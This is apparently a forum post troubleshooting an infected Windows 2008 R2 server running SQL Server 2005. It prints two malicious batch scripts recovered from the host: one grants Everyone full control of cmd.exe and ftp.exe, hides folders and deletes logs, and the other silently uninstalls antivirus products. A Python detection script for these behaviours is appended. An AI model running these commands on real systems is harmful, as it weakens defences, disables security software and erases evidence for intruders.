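Environment:
windows server 2008 r2
sql server 2005
Symptoms:
1. The Kingdee K3WISE client cannot log in to the server. Logging in to the SQL Server management tool as SA fails; after changing the SA password and restarting, the SA login fails again.
2. The server's shared files cannot be accessed by machine name or IP, although ping succeeds with no packet loss. Shared printers between clients can be accessed normally.
3. The taskbar on the server desktop always shows the network as disconnected, yet the server can reach the Internet and the network adapter looks normal when opened.
4. Installing system patches has no effect, and opening Group Policy produces an error.
5. Because the server holds a lot of data and applications, it was not reinstalled from scratch; an in-place upgrade was used instead, and fortunately compatibility problems were minor. After the upgrade succeeded, startup reported that 123.bat could not be found. (It was referenced under the registry RUN key; after the upgrade the file is located at C:\Windows.old\Windows\SysWOW64\wbem\123.bat)
Attachments:
1. Contents of 123.bat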
@echo off
mode con: cols=13 lines=1
md C:\Progra~1\shengda
md C:\Progra~1\kugou2010
md C:\download
regsvr32 /s shell32.dll
regsvr32 /s WSHom.Ocx
regsvr32 /s scrrun.dll
regsvr32 /s c:\Progra~1\Common~1\System\Ado\Msado15.dll
regsvr32 /s jscript.dll
regsvr32 /s vbscript.dll
attrib +s +h C:\Progra~1\shengda
attrib +s +h C:\Progra~1\kugou2010
attrib +s +h C:\download
cacls cmd.exe /e /g system:f
cacls cmd.exe /e /g everyone:f
cacls ftp.exe /e /g system:f
cacls ftp.exe /e /g everyone:f
cacls c:\windows\help\akpls.exe /e /g system:f
cacls c:\windows\help\akpls.exe /e /g everyone:f
cacls C:\Progra~1\Common~1\System\ado\msado15.dll /e /g system:f
cacls C:\Progra~1\Common~1\System\ado\msado15.dll /e /g everyone:f
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v shell /f
cacls c:\windows\help\*.exe /e /g system:f
cacls c:\windows\debug\*.exe /e /g system:f
cacls c:\windows\system\*.exe /e /g system:f
del c:\windows\system32\wbem\se.bat
del c:\windows\system32\wbem\12345.bat
del c:\windows\system32\wbem\123456.bat
del c:\windows\system32\wbem\1234.bat
del c:\windows\system32\*.log
exit
The following file was also found, c:\windows\system\backs.bat:
wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive
wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive
cmd /c "C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe" /verysilent /suppressmsgboxes /norestart
exit
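
A triage aid for the two listings above, as an added example that is not part of the original post: it scans a batch script line by line and labels the behaviours seen in 123.bat and backs.bat. The rule names are labels chosen here, and SAMPLE is a handful of lines copied from the listings.

```python
import re

# Behaviour rules derived from the commands visible in 123.bat and backs.bat.
# The rule names are labels chosen for this example.
RULES = [
    ("acl_weakened", re.compile(r"^\s*cacls\s+\S+.*\s/g\s+(everyone|system):f\b", re.I)),
    ("hidden_system_attr", re.compile(r"^\s*attrib\s+(?=.*\+s\b)(?=.*\+h\b)", re.I)),
    ("silent_com_register", re.compile(r"^\s*regsvr32\s+/s\s", re.I)),
    ("run_key_modified", re.compile(r"^\s*reg\s+(add|delete)\s+.*\\CurrentVersion\\Run\b", re.I)),
    ("log_deleted", re.compile(r"^\s*del\s+.*\.log\b", re.I)),
    ("security_product_removed", re.compile(r"^\s*wmic(\.exe)?\s+product\s+where\s.*call\s+uninstall", re.I)),
    ("silent_uninstaller", re.compile(r'unins\d+\.exe"?\s+.*/verysilent', re.I)),
]

# Sample input: lines copied from the two listings on this page.
SAMPLE = r'''@echo off
md C:\download
regsvr32 /s WSHom.Ocx
attrib +s +h C:\download
cacls cmd.exe /e /g everyone:f
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v shell /f
del c:\windows\system32\*.log
wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
cmd /c "C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe" /verysilent /suppressmsgboxes /norestart
'''

def triage(script_text):
    """Return (line_number, rule_name, line) for every line that matches a rule."""
    findings = []
    for number, line in enumerate(script_text.splitlines(), start=1):
        for name, pattern in RULES:
            if pattern.search(line):
                findings.append((number, name, line.strip()))
    return findings

def summarize(findings):
    """Count findings per rule so scripts can be ranked during triage."""
    counts = {}
    for _, name, _ in findings:
        counts[name] = counts.get(name, 0) + 1
    return counts

if __name__ == "__main__":
    for number, name, line in triage(SAMPLE):
        print(f"line {number}: {name}: {line}")
```

Run over every .bat file recovered from the host (for example the copies under C:\Windows.old), a script that combines ACL changes on cmd.exe, log deletion and removal of security products stands out from ordinary administrative scripts.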